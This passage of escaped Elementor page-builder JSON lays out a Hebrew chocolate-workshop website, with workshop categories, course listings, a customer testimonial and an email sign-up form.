\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd?<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05e6\\u05e8\\u05d5 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05dc\\u05e8\\u05d2\\u05e2\\u05d9\\u05dd \\u05d4\\u05d0\\u05dc\\u05d4, \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05d4\\u05d2\\u05d9\\u05e2 \\\"\\u05db\\u05de\\u05e2\\u05d8 \\u05e9\\u05d1\\u05e2\\u05d9\\u05dd\\\" \\u05d5\\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05de\\u05d2\\u05d5\\u05d5\\u05df \\u05de\\u05d0\\u05db\\u05dc\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd \\u05e9\\u05e1\\u05d5\\u05d1\\u05d1\\u05d9\\u05dd \\u05e1\\u05d1\\u05d9\\u05d1 \\u05d4\\u05d0\\u05d5\\u05db\\u05dc \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1 \\u05e2\\u05dc \\u05db\\u05d5\\u05dc\\u05e0\\u05d5, \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d4\\u05d7\\u05dc \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05d9\\u05e8 \\u05d5\\u05e2\\u05d3 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05d6\\u05dc, \\u05d4\\u05db\\u05dc \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9 \\u05dc\\u05de\\u05d3\\u05d9 \\u05d1\\u05db\\u05dc \\u05e6\\u05d5\\u05e8\\u05d4 \\u05d5\\u05e6\\u05d1\\u05e2, \\u05db\\u05dc \\u05d3\\u05e8\\u05da \\u05d5\\u05e9\\u05e2\\u05d4.\\u00a0<\\/p>\",\"text_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19},\"typography_font_family\":\"Open Sans Hebrew\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1.6\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"17\"},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"15f91cbb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"44.298\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_position\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"385ae28\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/inner-hp.jpg\",\"id\":26}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4477cb\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"25\",\"bottom\":\"50\",\"left\":\"25\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"20\",\"bottom\":\"60\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"702ee38f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"60600fc4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"f9b0ce7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"6945b5b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":31,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-woman.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"fa7a00f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"afa7d0f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":28,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-company.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4a4b992\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"c498248\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":30,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-kids.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5684ff50\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"id\":24,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/michael-browning-188999.png\"},\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#190606\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.75},\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"115\",\"bottom\":\"50\",\"left\":\"115\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"74663cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"125f3fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05de\\u05d4 \\u05d4\\u05e9\\u05d1\\u05e2\\u05d9\\u05dd \\u05d4\\u05de\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e9\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd\",\"align\":\"center\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":53},\"typography_font_weight\":\"400\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"43\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"40\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6410b809\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"caption\":\"\\u05e0\\u05ea\\u05d9 \\u05d5\\u05d2\\u05d1\\u05e8\\u05d9\\u05d0\\u05dc\\u05d4 \\u05de\\u05e8\\u05d0\\u05e9\\u05d5\\u05df \\u05dc\\u05e6\\u05d9\\u05d5\\u05df\",\"text_color\":\"#cccccc\",\"caption_typography_typography\":\"custom\",\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":13},\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6c4e5757\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\\"\\u05ea\\u05de\\u05d9\\u05d3 \\u05d0\\u05d4\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d0\\u05e3 \\u05e4\\u05e2\\u05dd \\u05dc\\u05d0 \\u05d7\\u05e9\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d0\\u05e0\\u05d9 \\u05d0\\u05ea\\u05e8\\u05d2\\u05e9 \\u05db\\u05dc \\u05db\\u05da \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05dc\\u05dd \\u05e9\\u05dc \\u05de\\u05ea\\u05d5\\u05e7. \\u05ea\\u05d5\\u05d3\\u05d4 \\u05e8\\u05d1\\u05d4 \\u05dc\\u05e6\\u05d5\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3 \\u05e9\\u05e2\\u05d6\\u05e8 \\u05dc\\u05d9 \\u05dc\\u05de\\u05e6\\u05d5\\u05d0 \\u05d0\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea!\\\"\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":27},\"typography_font_weight\":\"400\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"17\",\"bottom\":\"0\",\"left\":\"17\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"25\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"25\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"typography_font_style\":\"italic\",\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c25e365\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26},\"typography_font_weight\":\"normal\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_text_color\":\"#40272c\",\"background_color\":\"#edd0a8\",\"border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"50\",\"bottom\":\"20\",\"left\":\"50\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"15\"},\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#5c0011\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A6%D7%A8%D7%95-%D7%A7%D7%A9%D7%A8\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"43f8ef8f\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"39181ab4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"10694622\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5212b57b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"2b9dc682\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"50c468d5\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"45bcecca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"37f8a4fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"285e10d7\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"24484b98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"33814887\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"48098d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f32a997\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"\\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4?\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is 